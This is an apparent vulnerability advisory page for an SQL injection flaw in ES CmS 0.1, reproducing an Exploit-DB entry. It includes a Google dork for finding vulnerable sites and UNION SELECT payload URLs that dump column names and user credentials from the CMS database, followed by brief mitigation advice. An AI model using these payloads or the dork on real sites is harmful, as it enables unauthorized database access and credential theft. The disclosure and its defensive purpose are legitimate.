ES CmS 0.1 Sql Injection Vulnerability

vendor:

ES CmS 0.1

by:

MR.XpR

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: ES CmS 0.1

Affected Version From: 0.1

Affected Version To: 0.1

Patch Exists: N/A

Related CWE: N/A

CPE: escms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: BT, 7

2012

ES CmS 0.1 Sql Injection Vulnerability

ES CmS 0.1 is vulnerable to SQL Injection. An attacker can exploit this vulnerability by sending malicious SQL queries to the application. This can be done by sending a crafted URL to the application. For example, http://localhost/page.php?id=[sqli] can be used to exploit this vulnerability. An attacker can also use the union select statement to retrieve data from the database. For example, http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod) and http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users can be used to retrieve data from the database.

Mitigation:

Developers should use parameterized queries to prevent SQL injection attacks. Input validation should also be used to prevent malicious input from being accepted by the application.

Source

Exploit-DB raw data:

# Exploit Title: ES CmS 0.1 Sql Injection Vulnerability

# Google Dork: inurl:/page.php?id=

# Date: 2012

# Exploit Author: MR.XpR

# Software Link: http://es-cms.com , http://sourceforge.net/projects/escms/files/esCMS Alpha/0.1/escms_alpha_v0_1.zip

# Version: v.0.1

# Tested on: BT , 7


# Poc :

http://localhost/page.php?id=[sqli]


# D3mo : 

http://server/page.php?id=-1+union+select+1,2,3,group_concat(column_name),5,6+from+information_schema.columns+where+table_name=char(table_cod)

http://server/page.php?id=-1+union+select+1,2,3,group_concat(nazwa,0x3a,haslo),5,6+from+es_cms_users


# TNx To : 

My Brothers Siamak.Black(Black.Boy) , UnknowN

 everything is not true ,The real is dream